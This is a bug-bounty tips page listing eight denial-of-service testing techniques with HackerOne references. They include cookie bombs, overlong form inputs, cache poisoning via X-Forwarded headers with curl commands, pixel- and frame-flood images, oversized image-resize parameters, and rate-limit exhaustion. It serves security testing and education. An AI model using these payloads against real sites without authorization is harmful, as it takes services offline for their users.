AllAboutBugBounty/DenialOfService.md
Muhammad Daffa 876d28d742
Denial of Service [1]
Create Denial of Service tips and add 8 tips
2020-09-10 18:17:16 +07:00

5.2 KiB

Denial of Service

  1. Cookie bomb
https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx

After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable

References: Hackerone #105363

  1. Try input a very long payload to form. For example using very long password or using very long email
POST /Register
[...]

username=victim&password=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

References: Hackerone #840598

  1. Cache poisoning, can using header "X-Forwarded-Port" or "X-Forwarded-Host"
curl -H "X-Forwarded-Port: 123" https://target.com/index.php?poison=1
curl -H "X-Forwarded-Host: target.com:123" https://target.com/index.php?poison=1

Reference: Hackerone #409370

  1. Pixel flood, using image with a huge pixels

Download the payload: Here

References: [Hackerone #390] (https://hackerone.com/reports/390)

  1. Frame flood, using GIF with a huge frame

Download the payload: Here

References: [Hackerone #400] (https://hackerone.com/reports/400)

Rare cases

  1. Sometimes in website we found a parameter that can adjust the size of the image, for example
https://target.com/img/vulnerable.jpg?width=500&height=500

Try change "500" to "99999999999"

https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999

References: Hackerone #751904

  1. Try changing the value of the header with something new, for example:
Accept-Encoding: gzip, gzip, deflate, br, br

References: Hackerone #861170

  1. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests

References: Hackerone #892615